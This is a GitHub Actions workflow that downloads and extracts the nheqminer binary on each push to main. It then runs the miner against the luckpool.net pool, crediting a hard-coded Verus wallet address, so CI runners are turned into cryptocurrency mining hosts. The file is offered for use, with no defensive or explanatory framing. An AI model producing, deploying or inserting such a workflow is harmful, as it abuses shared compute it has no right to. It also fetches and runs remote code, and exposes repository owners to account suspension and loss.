name: Run Nheqminer

on:
  push:
    branches:
      - main  # Change this to the branch you want to trigger the workflow on

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Install wget and tar
        run: sudo apt-get update && sudo apt-get install -y wget tar

      - name: Download nheqminer
        run: |
          wget https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz

      - name: Extract nheqminer
        run: |
          tar -xvf nheqminer-Linux-v0.8.2.tgz

      - name: List extracted files
        run: |
          ls -l  # List files in the current directory

      - name: Identify nheqminer directory
        id: identify
        run: |
          for dir in nheqminer*; do
            if [ -d "$dir" ]; then
              echo "Found directory: $dir"
              echo "::set-output name=dir::$dir"
            fi
          done

      - name: List files in nheqminer directory
        run: |
          ls -l ${{ steps.identify.outputs.dir }}  # List files in the identified directory

      - name: Run nheqminer
        run: |
          cd ${{ steps.identify.outputs.dir }}  # Change to the identified directory
          ./nheqminer -v -l na.luckpool.net:3956 -u RP8SNudJuHRv3GJsxb2LJBrKxQKRdKoHL3.kiukiu1 -p x -t 2
